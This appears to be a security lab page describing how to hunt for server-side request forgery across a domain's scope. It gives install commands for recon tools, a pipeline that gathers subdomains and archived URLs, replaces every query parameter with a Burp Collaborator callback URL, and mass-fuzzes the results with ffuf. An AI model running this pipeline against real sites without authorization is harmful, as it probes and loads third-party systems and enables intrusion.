Finding SSRF (all scope)
The goal of this laboratory is to use some tools to collect all subdomains from a specific domain, all the URLs and parameters, and retrieve some results using the burp collaborator utility.

Tools

subfinder - subdomain discovery.
How to install it:
1
GO111MODULE=on go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder
Copied!
qsreplace - Accept URLs on stdin, replace all query string values with a user-supplied value.
How to install it:
1
go get -u github.com/tomnomnom/qsreplace
Copied!
gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
How to install it:
1
GO111MODULE=on go get -u -v github.com/lc/gau
Copied!
waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domain.
How to install it:
1
go get github.com/tomnomnom/waybackurls
Copied!
gf: A wrapper around grep, to help you grep for things.
How to install it:
1
go get -u github.com/tomnomnom/gf
Copied!
List to exclude:
1
grep -v "\.css?ver" | grep -v "\.js" | grep -v "\.png" | grep -v "\.woff" | grep "collaborator"
Copied!
ffuf: Fast web fuzzer written in Go.
How to install it:
1
go get -u github.com/ffuf/ffuf
Copied!

Scope

1
In Scope: *.example.com
Copied!

Harvester

1
gau -subs example.com; subfinder -d example.com -silent | waybackurls | sort -u > output.txt
Copied!

Replacing params

1
cat output.txt | qsreplace "http://xxxxxxxxxxx.burpcollaborator.net" >> fuzz_list.txt
Copied!

Fuzzing and test

1
ffuf -c -w fuzz_list.txt -u FUZZ -t 200 -r
Copied!

Resources

To collect all URLs from several sources:
GitHub - signedsecurity/sigurlfind3r: A passive reconnaissance tool for known URLs discovery - it gathers a list of URLs passively using various online sources.
GitHub
Last modified 1mo ago